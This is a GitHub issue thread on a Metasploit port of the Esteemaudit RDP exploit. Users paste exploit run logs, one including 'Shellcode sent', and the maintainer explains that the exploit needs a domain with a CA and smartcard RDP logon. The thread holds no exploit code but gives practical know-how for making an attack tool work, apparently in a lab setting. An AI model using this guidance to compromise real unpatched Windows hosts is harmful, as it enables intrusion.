BlackMathIT / Esteemaudit-Metasploit

Porting for Metasploit of the infamous Esteemaudit RDP Exploit
http://www.blackmath.it

[-] 10.0.0.42:3389 - The machine is not vulnerable! #10

Open f4rb3r1o opened 7 years ago

f4rb3r1o commented 7 years ago

Hi friend, well done on the effort! I have a little problem. After looking at most of the issues and trying to solve it myself, I decided to write to you. After following the whole process and debugging/fixing some problems myself, I'm getting this message: `[-] 10.0.0.42:3389 - The machine is not vulnerable!`. When going to the containing folder and executing `wine Esteemaudit-2.1.0.exe` I'm getting:

[*] Creating callback socket
[+] Listening on 0.0.0.0:0
[+] Callback socket creation complete
[+] Connected to target 10.0.0.42:3389
[+] Sending Space Bar
[-] Connection timeout (exceeded computed threshold of 10.00 seconds)
[-] Exploit NOT successful :-(

Please help. Regards.

BlackMathIT commented 7 years ago

Hi @liad1234, which OS is your target, and is it on a domain or not?

f4rb3r1o commented 7 years ago

Hi, the OS is Windows XP Professional x64 Edition SP1, not on a domain.

BlackMathIT commented 7 years ago

@liad1234 the quickest way to test the exploit is to virtualize two machines: a Windows Server edition from 2003 to 2012 R2 to act as domain controller, and a Windows Server 2003 or XP to act as target. The exploit works only in a domain infrastructure, because it needs a CA to validate the certificate inside the logon request for smartcard authentication, and that creates the callback needed to trigger the exploit. By default every domain controller applies a GPO that authorizes the target machine to log in with RDP smartcard logon.

f4rb3r1o commented 7 years ago

Thank you very much. Do you maybe have any link that describes the vulnerability and the dependencies? (Sorry to bother you.)

BlackMathIT commented 7 years ago

https://researchcenter.paloaltonetworks.com/2017/05/unit42-dissection-esteemaudit-windows-remote-desktop-exploit/

Have fun! :)

paibanezma commented 7 years ago

Hi,

I am experiencing the same connection timeout problems:

root@kali:/usr/share/esteemaudit# wine Esteemaudit-2.1.0.exe
[*] Creating callback socket
[+] Listening on 0.0.0.0:444
[+] Callback socket creation complete
[+] Connected to target 192.168.55.100:3389
[+] Sending Space Bar
[*] Building exploit buffer.
[+] Exploit buffer created.
[+] Sending Enter key
[+] SELECT_FILE - GPK Card MF
[+] GET_RESPONSE - data unit size
[+] GET_RESPONSE - serial number
[+] SELECT_FILE - GPK Card MF
[+] SELECT_FILE - Don't care which
[+] GET_RESPONSE - from SELECT_FILE
[+] READ_BINARY - unknown offset
[+] SELECT_FILE - Don't care which
[+] GET_RESPONSE - from SELECT_FILE
[+] READ_BINARY - start of file
[+] Shellcode sent
[+] SELECT_FILE - GPK Card MF
[*] First stage complete
[-] Connection timeout (exceeded computed threshold of 10.00 seconds)
[-] Exploit NOT successful :-(

My scenario is:

The victim is accessible using RDP with an administrator account.

It is a really interesting lab to work with this exploit. Well done!

Thanks a lot, and I am looking forward to your news.